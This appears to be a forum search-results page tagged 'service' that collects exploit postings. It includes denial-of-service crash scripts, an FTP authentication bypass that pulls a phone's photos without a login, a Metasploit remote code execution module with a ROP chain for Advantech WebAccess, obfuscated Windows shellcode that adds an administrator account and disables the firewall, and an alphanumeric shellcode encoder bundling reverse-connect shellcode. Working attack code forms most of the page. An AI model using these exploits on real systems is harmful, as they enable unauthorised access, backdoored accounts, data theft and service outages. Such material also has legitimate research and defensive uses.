Search the forums

Showing results for the tag 'service'.

13 results found

  1. # Exploit Title: Microsoft Windows Explorer Out-of-Bound read - Denial of Service (PoC)
     # Date: 2018-09-01
     # Exploit Author: Ghaaf
     # Vendor Homepage: http://www.microsoft.com
     # Version: Windows 7(x86/x64)
     # Tested on: 6.1.7601 Service Pack 1 Build 7601
     # CVE: N/A
     buffer = ''
     # ... crafted PE image bytes (long hex blob omitted from this listing) ...
     open("poc.exe", "wb").write(buffer)
  2. # Exploit Title: D-Link DIR-615 - Denial of Service (PoC)
     # Date: 2018-08-09
     # Vendor Homepage: http://www.dlink.co.in
     # Hardware Link: https://www.amazon.in/D-Link-DIR-615-Wireless-N300-Router-Black/dp/B0085IATT6
     # Version: D-Link DIR-615
     # Category: Hardware
     # Exploit Author: Aniket Dinda
     # Tested on: Linux (kali linux)
     # Web: https://hackingvila.wordpress.com/2018/08/24/d-link-dir-615-buffer-overflow-via-a-long-authorization-http-header-click-here/
     # Cve: CVE-2018-15839
     # Proof Of Concept:
     # 1- First connect to this network.
     # 2- Open BurpSuite and start the intercept, making the necessary proxy changes to the internet browser.
     # 3- Go to Easy setup >
     # 4- Now, with Burp intercept on, you will find an "Authorization: Basic" or "cookie: SessionId" followed by a string. Paste a string consisting of 5000 zeros.
     # 5- Then forward the connection.
     # 6- Your router then automatically logs out and the net connection will be gone.
  3. #!/usr/bin/env python
     #==================================================================================
     # Exploit Title: FTP Media Server 3.0 - Authentication Bypass and Denial of Service
     # Date: 2015-05-25
     # Exploit Author: Wh1t3Rh1n0 (Michael Allen)
     # Exploit Author's Homepage: http://www.mikeallen.org
     # Software Link: https://itunes.apple.com/us/app/ftp-media-server-free/id528962302
     # Version: 3.0
     # Tested on: iPhone
     #==================================================================================
     # ------------------
     # Denial of Service:
     # ------------------
     # The FTP server does not properly handle errors raised by invalid
     # FTP commands. The following command, which sends an invalid PORT command to
     # the FTP server, will crash the server once it is received.
     #   echo -en "PORT\r\n" | nc -nv 192.168.2.5 50000
     # ----------------------
     # Authentication Bypass:
     # ----------------------
     # The FTP server does not handle unauthenticated connections or incorrect login
     # credentials properly. A remote user can issue commands to the FTP server
     # without authenticating or after entering incorrect credentials.
     # The following proof-of-concept connects to the given FTP server and
     # downloads all files stored in the "Camera Roll" folder without providing a
     # username or password:
     import sys
     from ftplib import FTP

     # both host and port are required (the original checked only for one argument)
     if len(sys.argv) < 3:
         print "Usage: ./ftp-nologin.py [host] [port]"
         exit()
     host = sys.argv[1]
     port = int(sys.argv[2])

     files = []
     def append_file(s):
         # keep only the file name from each LIST line
         files.append(s.split(' ')[-1])

     blocks = []
     def get_blocks(d):
         blocks.append(d)

     ftp = FTP()
     print ftp.connect(host, port)
     ftp.set_pasv(1)
     ftp.cwd("Camera Roll")
     print ftp.retrlines('LIST', append_file)
     files.pop(0)
     for filename in files:
         print "Downloading %s..." % filename
         ftp.retrbinary('RETR /Camera Roll/' + filename, get_blocks)
         f = open(filename, 'wb')
         for block in blocks:
             f.write(block)
         f.close()
         print "[+] File saved to: %s" % filename
         blocks = []
     ftp.quit()
  4. # Exploit Title: Acunetix WVS Reporter 10.0 - Denial of Service (PoC)
     # Exploit Author: Ali Alipour
     # Date: 2018-08-22
     # Vendor Homepage : https://www.acunetix.com/
     # Tested on : Windows 10 - 64-bit
     # Steps to Reproduce
     # Run the python exploit script; it will create a new
     # file with the name "exploit.txt". Copy the text inside "exploit.txt"
     # and start the Acunetix WVS Reporter 10.0 program.
     # In the new window click "Report Preview" > "Load Report"
     # and upload a sample report, then click on the print button.
     # Now paste the content of "exploit.txt" into the field "Pages".
     # Click "OK" and you will see a crash.
     #!/usr/bin/python
     buffer = "A" * 20
     payload = buffer
     try:
         f = open("exploit.txt", "w")
         print "[+] Creating %s bytes evil payload.." % len(payload)
         f.write(payload)
         f.close()
         print "[+] File created!"
     except:
         print "File cannot be created"
  5. # Exploit Title: Easy PhotoResQ 1.0 - Denial Of Service (PoC)
     # Author: Gionathan "John" Reale
     # Discovery Date: 2018-08-29
     # Homepage: https://www.hdtune.com/
     # Software Link: https://www.hdtune.com/download.html
     # Tested Version: v1.0
     # Tested on OS: Windows 7 32-bit
     # Steps to Reproduce: Run the python exploit script; it will create a new
     # file with the name "exploit.txt". Copy the content of the new file "exploit.txt".
     # Now start the program. Once inside the program, click "File" > "Options".
     # In the field "Folder / filename" paste the copied content from "exploit.txt".
     # Now click "OK" and see a crash!
     #!/usr/bin/python
     buffer = "A" * 6000
     payload = buffer
     try:
         f = open("exploit.txt", "w")
         print "[+] Creating %s bytes evil payload.." % len(payload)
         f.write(payload)
         f.close()
         print "[+] File created!"
     except:
         print "File cannot be created"
  6. #Exploit Title: Trillian 6.1 Build 16 - "Sign In" Denial of service (PoC)
     #Discovery by: Jose Miguel Gonzalez
     #Discovery Date: 2018-08-29
     #Vendor Homepage: https://www.trillian.im/
     #Software Link: https://www.trillian.im/download/
     #Tested Version: 6.1 Build 16
     #Tested on OS: Windows 10 Single Language x64
     #Steps to produce the crash
     #1.- Run the python code: trillian.py
     #2.- Open trillian.txt and copy its content to the clipboard
     #3.- Open the Trillian application
     #4.- Paste the clipboard into "Username"
     #5.- Put "1234" in "Password"
     #6.- Sign In
     #7.- Crashed
     mem = "\x41" * 214
     f = open("trillian.txt", "w")
     f.write(mem)
     f.close()
  7. # Exploit Title: ipPulse 1.92 - 'TCP Port' Denial of Service (PoC)
     # Discovery by: Diego Santamaria
     # Discovery Date: 2018-08-28
     # Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
     # Software Link: http://download.netscantools.com/ipls192.zip
     # Tested Version: 1.92
     # Vulnerability Type: Denial of Service (DoS) Local
     # Tested on OS: Windows 7 Professional
     # Steps to Reproduce:
     # 1. Run the python code TCP_port.py
     # 2. Open TCP_exploit.txt and copy the content
     # 3. Open ipPulse.exe
     # 4. Choose 'Target Editor'
     # 5. Write '1' in 'IP Address'
     # 6. Paste the content from TCP_exploit.txt into 'TCP Port'
     # 7. Press 'Add Above Fields to Target List'
     # 8. Press OK and it crashes
     #!/usr/bin/env python
     content = "\x41" * 4087
     f = open("TCP_exploit.txt", "w")
     f.write(content)
     f.close()
  8. Client

     A complete introduction to denial of service (DDoS) attacks

     What is DDoS? DDoS, or in full denial of service: it is better to first become familiar with the concept of denial of service. Denial of service attacks are a type of organised attack whose goal is to prevent a particular service from coming up, for example preventing a site from opening for its other visitors.

     How does a denial of service attack happen? Most of these attacks are carried out by sending useless data (packets) to a server in very large quantities. For example, suppose a site or server is only capable of serving the site to 100 systems or clients; if the number of users visiting the site exceeds 100, the site goes offline and can no longer be reached.

     Keep in mind that although the goal of the annoysec website is to spread users' knowledge, abusing denial of service attacks is in fact a crime.

     Methods of carrying out denial of service (Example Of DOS attack): using the command prompt (very outdated), using a virtual private server (VPS), using a botnet, and so on. You have surely worked with the ping command; in the past, with these commands, you could carry out a DDoS at a suitable and acceptable speed, but this method is now obsolete. Virtual server: given the power and high speed of the internet, by writing an application or using updated, new software one can carry out denial of service attacks on a particular server, etc.

     Also, Wikipedia's description of botnets: botnets are networks formed by taking control of a collection of computers called bots. These networks are controlled by one or more attackers, called botmasters, with the goal of carrying out malicious activities. In other words, bots are malicious code that run on host computers so that botmasters can control them remotely and make this collection perform various activities. For example, the server administrator runs a bat file on various computers to carry out a denial of service.

     In the next articles we will cover prevention methods and the various other methods.
  9. ##
     # This module requires Metasploit: http://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     class MetasploitModule < Msf::Exploit::Remote
       Rank = GoodRanking

       include Msf::Exploit::Remote::DCERPC
       include Msf::Exploit::Egghunter

       def initialize(info = {})
         super(update_info(info,
           'Name'           => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow',
           'Description'    => %q{
             This module exploits a stack buffer overflow in Advantech WebAccess 8.2.
             By sending a specially crafted DCERPC request, an attacker could overflow
             the buffer and execute arbitrary code.
           },
           'Author'         => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ],
           'License'        => MSF_LICENSE,
           'References'     =>
             [
               [ 'ZDI', '17-938' ],
               [ 'CVE', '2017-14016' ],
               [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ]
             ],
           'Privileged'     => true,
           'DefaultOptions' =>
             {
               'EXITFUNC' => 'thread',
             },
           'Payload'        =>
             {
               'Space'    => 2048,
               'BadChars' => "\x00",
             },
           'Platform'       => 'win',
           'Targets'        =>
             [
               [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31',
                 {
                   'Ret'   => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14
                   'Slide' => 0x07048f5b, # retn
                   'Jmp'   => 0x0706067e  # pop ecx; pop ecx; ret 0x04
                 }
               ],
             ],
           'DisclosureDate' => 'Nov 02 2017',
           'DefaultTarget'  => 0))
         register_options([ Opt::RPORT(4592)])
       end

       def create_rop_chain()
         # this target opts into dep
         rop_gadgets = [
           0x020214c6, # POP EAX # RETN [BwKrlAPI.dll]
           0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll]
           0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll]
           0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll]
           0x0201a646, # POP EBP # RETN [BwKrlAPI.dll]
           0x07024822, # & push esp # ret [BwPAlarm.dll]
           0x070442dd, # POP EAX # RETN [BwPAlarm.dll]
           0xffffffff, # Value to negate, will become 0x00000001
           0x070467d2, # NEG EAX # RETN [BwPAlarm.dll]
           0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll]
           rand_text_alpha(4).unpack('V'),
           rand_text_alpha(4).unpack('V'),
           rand_text_alpha(4).unpack('V'),
           0x02030af7, # POP EAX # RETN [BwKrlAPI.dll]
           0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx)
           0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll]
           0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll]
           0x07078df5, # POP EAX # RETN [BwPAlarm.dll]
           0xffffffc0, # Value to negate, will become 0x00000040
           0x070467d2, # NEG EAX # RETN [BwPAlarm.dll]
           0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll]
           0x0706fe66, # POP EDI # RETN [BwPAlarm.dll]
           rand_text_alpha(4).unpack('V'),
           rand_text_alpha(4).unpack('V'),
           0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll]
           0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll]
           0x90909090, # nop
           0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll]
         ].flatten.pack("V*")
         return rop_gadgets
       end

       def exploit
         connect
         handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
         print_status("Binding to #{handle} ...")
         dcerpc_bind(handle)
         print_status("Bound to #{handle} ...")

         # send the request to get the handle
         resp = dcerpc.call(0x4, [0x02000000].pack('V'))
         handle = resp.last(4).unpack('V').first
         print_good("Got a handle: 0x%08x" % handle)

         egg_options = { :eggtag => "0day" }
         egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options)

         # apparently this is called a ret chain
         overflow = [target['Slide']].pack('V')
         overflow << [target['Slide']].pack('V')
         overflow << [target['Slide']].pack('V')
         overflow << [target['Slide']].pack('V')
         overflow << [target['Slide']].pack('V')
         overflow << [target['Slide']].pack('V')
         overflow << [target['Jmp']].pack('V')
         overflow << [target['Ret']].pack('V')
         overflow << [target['Slide']].pack('V')
         overflow << [target['Slide']].pack('V')
         overflow << [target['Slide']].pack('V')
         overflow << [target['Slide']].pack('V')
         overflow << [target['Slide']].pack('V')
         overflow << [target['Slide']].pack('V')
         overflow << create_rop_chain()
         overflow << egghunter
         overflow << egg
         overflow << rand_text_alpha(0x1000-overflow.length)

         # sorry but I dont like msf's ndr class.
         sploit = [handle].pack('V')
         sploit << [0x000138bd].pack('V') # opcode we are attacking
         sploit << [0x00001000].pack('V') # size to copy
         sploit << [0x00001000].pack('V') # size of string
         sploit << overflow

         print_status("Trying target #{target.name}...")
         begin
           dcerpc_call(0x1, sploit)
         rescue Rex::Proto::DCERPC::Exceptions::NoResponse
         ensure
           disconnect
         end
         handler
       end
     end
  10. import sys
      import datetime
      import socket
      import argparse
      import os
      import time

      remote_host = ''
      remote_port = ''

      def callExit():
          print "\n\t\t[!] exiting at %s .....\n" % datetime.datetime.now()
          sys.exit(1)

      def mySocket():
          try:
              s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          except socket.error:
              print 'Failed to create socket'
              sys.exit()
          print "\n\t[+] Socket Created"
          s.connect((remote_host, remote_port))
          print "\n\t[+] Socket Connected to %s on port %s" % (remote_host, remote_port)
          return s

      # 250 backburner 1.0 Ready.
      def receiveBanner(s):
          banner = s.recv(4096)
          print banner

      def receiveData(s):
          data = s.recv(4096)
          print data

      def setDataCommand(s):
          receiveData(s)  # backburner>
          print "Set Data Command"
          time.sleep(1)
          command = "set data\r\n"
          try:
              s.sendall(command)
          except socket.error:
              print 'Send failed'
              sys.exit()
          print "BackBurner Manager should have crashed"
          receiveData(s)  # 200 Help
          receiveData(s)  # Available Commands:.....and all set of commands
                          # backburner>

      def main():
          if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
              os.system('clear')
          parser = argparse.ArgumentParser(description = 'RCE Autodesk BackBurner')
          parser.add_argument('--host', nargs='?', dest='host', required=True, help='remote IP of Autodesk host')
          # type=int so a port given on the command line is an integer like the default (socket.connect rejects a string port)
          parser.add_argument('--port', nargs='?', dest='port', default=3234, type=int, help='remote Port running manager.exe')
          args = parser.parse_args()
          if args.host == None:
              print "\t[!] IP of remote host?"
              sys.exit()
          global remote_host
          global remote_port
          remote_host = args.host
          remote_port = args.port
          print "remote_host: %s" % remote_host
          print "remote_port: %s" % remote_port
          s = mySocket()
          receiveBanner(s)
          setDataCommand(s)
          print 'exit'
          sys.exit()

      if __name__ == '__main__':
          try:
              sys.exit(main())
          except KeyboardInterrupt:
              callExit()
  11. #Author: Ali Razmjoo
      #Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start terminal service]
      Obfuscated Shellcode Windows x64 [1218 Bytes].c
      /*
      #Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start terminal service]
      #length: 1218 bytes
      #Date: 13 January 2015
      #Author: Ali Razmjoo
      #tested On: Windows 7 x64 ultimate
      WinExec => 0x769e2c91
      ExitProcess => 0x769679f8
      ====================================
      Execute :
      net user ALI ALI /add
      net localgroup Administrators ALI /add
      NET LOCALGROUP "Remote Desktop Users" ALI /add
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
      netsh firewall set opmode disable
      sc config termservice start= auto
      ====================================
      Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']
      Thanks to my friends , Dariush Nasirpour and Ehsan Nezami
      C:\Users\Ali\Desktop>objdump -D shellcode.o
      shellcode.o: file format elf32-i386
      Disassembly of section .text:
      [objdump disassembly listing omitted]
      */
      [C source with the shellcode byte array omitted; the listing is cut off mid-array]
f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\xbb\x9b\x4f\xd0\x30\xba\x63\x36\x46\x46\x31\xd3\xff\xd3"; fprintf(stdout,"Length: %d\n\n",strlen(shellcode)); (*(void(*)()) shellcode)(); }
  12. /* ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// Alphanumeric Shellcode Encoder Decoder Copyright © 1985-2008 Avri Schneider - Aladdin Knowledge Systems, Inc. All rights reserved. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/gpl-3.0.html>. +-----------+ WORKS CITED +-----------+ +--------------------------------------------------------------------------------------------------+ |Matt Conover, Soren Macbeth, Avri Schneider 05 October 2004 | |Encode2Alnum (polymorphic alphanumeric decoder/encoder) | |Full-Disclosure <http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/027147.html> | | | |CLET Team. Aug. 2003 | |Polymorphic Shellcode Engine | |Phrack <http://www.phrack.org/show.php?p=61&a=9> | | | |Ionescu, Costin. 1 July 2003 | |Re: GetPC code (was: Shellcode from ASCII) | |Vuln-Dev <http://www.securityfocus.com/archive/82/327348> | | | |rix. Aug. 2001 | |Writing ia32 alphanumeric shellcodes | |Phrack <http://www.phrack.org/show.php?p=57&a=15> | | | |Wever, Berend-Jan. 28 Jan. 
2001 | |Alphanumeric GetPC code | |Vuln-Dev <http://www.securityfocus.com/archive/82/351528> | |ALPHA3 <http://skypher.com/wiki/index.php?title=ALPHA3> | +--------------------------------------------------------------------------------------------------+ ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// */ #include <time.h> #include <stdio.h> #include <windows.h> #define MAX_BYTES 0x100 #define MAX_ENCODED_SHELLCODE 2000 //this will be allocated on the stack #define MIN_IP_STR_LEN 7 #define MAX_IP_STR_LEN 15 #define OFFSET_XOR_AL1_A 15 #define OFFSET_XOR_AL1_B 18 #define OFFSET_XOR_AL2_A 37 #define OFFSET_XOR_AL2_B 40 #define OFFSET_PUSH_DWORD1 0 #define OFFSET_PUSH_DWORD2 1 #define OFFSET_PUSH_DWORD3 4 #define OFFSET_PUSH_DWORD4 12 #define OFFSET_RANDOMIZED_DECODER_HEAD 14 #define SIZE_RANDOMIZED_DECODER_HEAD 16 BYTE EncodedShellcode[] = // encoded 336 bytes "PZhUQPTX5UQPTHHH4D0B8RYkA9YA3A9A2B90B9BhPTRWX5PTRW4r8B9ugxPqy8xO" "wck4WTyhlLlUjyhukHqGCixVLt4UTCBRwsV3pRod8OLMKO9FXJVTJJbJX4gsVXAt" "Q3ukAxFmVIw7HyBfDyNv5zXqg4PQeTxZJLm56vRjSidjSz75mHb2RL5Hl30tUmnH" "HtXEv7oZVdiEv1QwWijcgVk4CZn7NI3uRai32AZ7FS0Iq1cwWc5T5RlnTIiKJVmq" "4T4MElucobfP4vWyB0OfB34JRJ9T4zjLlbKmlk7jTicj11869F001uAdTZKNJ7wL" "mOv5mLlGPKFLtNI2525WhktKDO0NIlseHIuJ33xv7xGQAW55eZKXHw78zfvCI2U0" "9Ulw5ZZhynmxG7JZZgJAYbg1MEp5QcOv7AYkYfcHQDWVMlJnzOSh8nzg1NZZn5Px" "11U5INVEtvZOS1E094HqmbB6K1MfRIq7KQyNOeL7NHI1Xnwhyhy69bg2bTexGnkc" "CEt90vn3DaFxGaFuRIPg0NK40kdg0L9ImaFbGy1Wl7JyGeJByHdfRCSYzvCzVa2v" "RtQWG5lxRMN1CZREvyKFvfwij3X2P81J1wk9ZLmGAqxGPuQv7RBX411iaWKCLGnD" "kwRZKREaRis5V7c5ILxKfAx6MbH40T53PnX9ZwSWtYzbHwCzkS0Ev5iVmLmS3xSk" "1telLPYuGyNvX1TyJ3yLdOwckr"; // example: make encoder choose more uppercase bytes... 
#define ADDITIONAL_CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ" #define ALNUM_CHARSET ADDITIONAL_CHARSET "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" // <--- allowed charset // feel free to //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////change - YMMV #define REGISTER_WITH_ADDRESS_OF_SHELLCODE esp // <--- change this to the register holding the address of the decoder//////////// #define _Q(str) #str #define Q(str) _Q(str) #define P(str) #str ##" // <--- buffer offset\n"## _Q(str) /////////////////////////////////// #define CONNECT_BACK_SHELLCODE // //#undef CONNECT_BACK_SHELLCODE //undefine CONNECT_BACK_SHELLCODE to use your own - and place it in shellcode[] >-----------------. /////////////////////////////////////////////////////////////////// | int main(); // | UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length); // | UCHAR get_push_register_instruction(UCHAR *reg); // | UCHAR get_random_alnum_value(); // | UCHAR get_random_alnum_push_dword_opcode(); // | UCHAR *get_nop_slide(UINT size, UINT slide); /////// | UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide);// | UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide); // | UCHAR *shuffle(UCHAR str[], UINT length); /////// | DWORD my_htonl(DWORD dw_in); // | DWORD ip_str_to_dw(UCHAR *str); // | BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key); // | BOOL is_alnum(UCHAR c); // | BOOL str_is_alnum(UCHAR *str); // | UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index); // | UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1); // | struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c); // | struct xor2_key *choose_random_node(struct xor2_key *head); // | void free_p_xor2_key(struct 
xor2_key *node); // | // | struct xor2_key { // | UCHAR xor2; // | UCHAR key; // | struct xor2_key *prev; // | struct xor2_key *next; // | } xor2_key; // | // | // | // Title: Win32 Reverse Connect // | // Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 // | // Author: hdm[at]metasploit.com // | #ifdef CONNECT_BACK_SHELLCODE // | #define OFFSET_IP_ADDRESS 154 // | #define OFFSET_TCP_PORT_NUMBER 159 // | #define IP_ADDRESS "127.0.0.1" // | #define TCP_PORT_NUMBER 123 // | DWORD ip_address; // | UCHAR shellcode[] = // | "\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa" // | "\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2" // | "\x73\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e" // | "\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64" // | "\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57" // | "\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a" // | "\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8" // | "\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90" // | "\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57" // | "\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68" // | "IPIP" // I.P. 
address // | "\x68" // | "PORT" // TCP port number // | "\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44\x8d\x3c\x24" // | "\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d" // | "\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10" // | "\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00\x51\xff\x55" // | "\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24\x57\xff\x55" // | "\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b" // | "\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x49" // | "\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\xc1" // | "\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x01" // | "\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\xeb" // | "\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00"; // | #else ////////////////////////////////////// | UCHAR shellcode[] = "\xCC YOUR SHELLCODE GOES HERE \xCC"; // <----------------- here ------------------------------------------' #endif // DWORD size = sizeof(shellcode)-1; // // int main() { ///////////////////////////////////////////////////////// //(decoder address is in ecx when decoder starts) // UCHAR PUSH_REGISTER_WITH_DECODER_ADDRESS = get_push_register_instruction(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)); // >----------. // // | #define END_OF_ENCODED_SHELLCODE 'A','L','D','N' // this is the terminating string of the encoded shellcode // | UCHAR str_end_of_encoded_shellcode[]= {END_OF_ENCODED_SHELLCODE}; //////////////////////////////////////////////// | UCHAR xor_al1 = get_random_alnum_value(); // this is used to zero out AL the first time | UCHAR xor_al2 = get_random_alnum_value(); // this is used to zero out AL the second time | int offset_imul_key = '\xC1';//////////////////////// | int jne_xor1 = '\xC2';// >---------------------------------------------------------. 
| int jne_xor2 = '\xC3';// >--------------------------------------------------------------| | // you would need to play with these two values if you want to reduce | | // the size of the NOP slides - they obviously need to stay alnum. | | // You could also play with the value of AL before the XOR is done | | // to get your desired negative offset. keep in mind that it will cost | | // you instructions to get al to the value you want (if you use xor of | | // two alphanumeric bytes, you would need to push first alphanumeric | | // char to the stack, pop eax, then xor it with it's alnum complement) | | // This playing around would result in an even harder to detect decoder | | // as the offsets would be different | | int size_decoder ='\xC4'; // | | int half_size_decoder ='\xC5'; //////////////////////////////////////////////////////////////////// | | UCHAR imul_instruction_1 ='\x6B'; // | | UCHAR imul_instruction_2 ='\x41'; // | | UCHAR imul_instruction_3 ='\xC6'; //size of decoder+1 // | | UCHAR imul_instruction_4 ='\xC7'; //initial key (random alnum) // | | // // | | UINT column=0, i=0; /////////////////////////////// | | UCHAR *alnum = ALNUM_CHARSET; // | | UCHAR *p_alnum = alnum; // | | UCHAR decoder[] = // | | { //////////////////////////////////////////////////////////////////////////////// | | // | | //[step_1] -- multiply first encoded byte with key | | //[step_2] -- xor result of step_1 with second encoded byte to get the decoded byte | | // | | // Each binary byte is encoded into three alphanumeric bytes. | | // The first byte multipled by the third byte xor'ed against the second byte yeilds the original | | // binary byte. 
| | // | | // TODO: | | // .--(first byte ^ second byte) * third byte | | // '--(second byte ^ first byte) * third byte | | // | | // .--(first byte ^ third byte) * second byte | | // '--(third byte ^ first byte) * second byte | | // | | // .--(second byte ^ third byte) * first byte | | // '--(third byte ^ second byte) * first byte | | // | | // .--(first byte * second byte) ^ third byte | | // '--(second byte * first byte) ^ third byte | | // | | // .--(first byte * third byte) ^ second byte <-- decoder/encoder implemented | | // '--(third byte * first byte) ^ second byte <-- decoder implemented (same encoder) | | // | | // .--(second byte * third byte) ^ first byte | | // '--(third byte * second byte) ^ first byte | | // | | // | | // The above is divided into pairs, each pair has the same values (in parenthesis) just at different offsets, | | // and we can switch them around with no effect. Each option requires a different decoder, but each pair can use the | | // same encoder. | | // | | /////////// DECODER HEAD (will be randomized by sliding instructions) //////// >----------------------------------|----|---. /* 1*/ '\x50', //push ??? (this can change) // [eax = address of decoder]------+ | | | /* 2*/ '\x50', //push ??? (this can change) // [ecx = address of decoder]------+ | | | /* 3*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (decoder address) // [edx = address of decoder]------+ | | | /* 4*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (base offset for cmp) // [ebx = address of decoder]------+ | | | /* 5*/ '\x50', //push ??? (this can change) // [esp = address of decoder]------+ | | | /* 7*/ '\x6A', half_size_decoder, //push 35h (word offset for cmp) // [ebp = decoder size / 2]--------+ | | | /*12*/ '\x68', END_OF_ENCODED_SHELLCODE, //push END_OF_ENCODED_SHELLCODE // [esi = 4 bytes terminating key]>+ | | | /*13*/ '\x50', //push ??? 
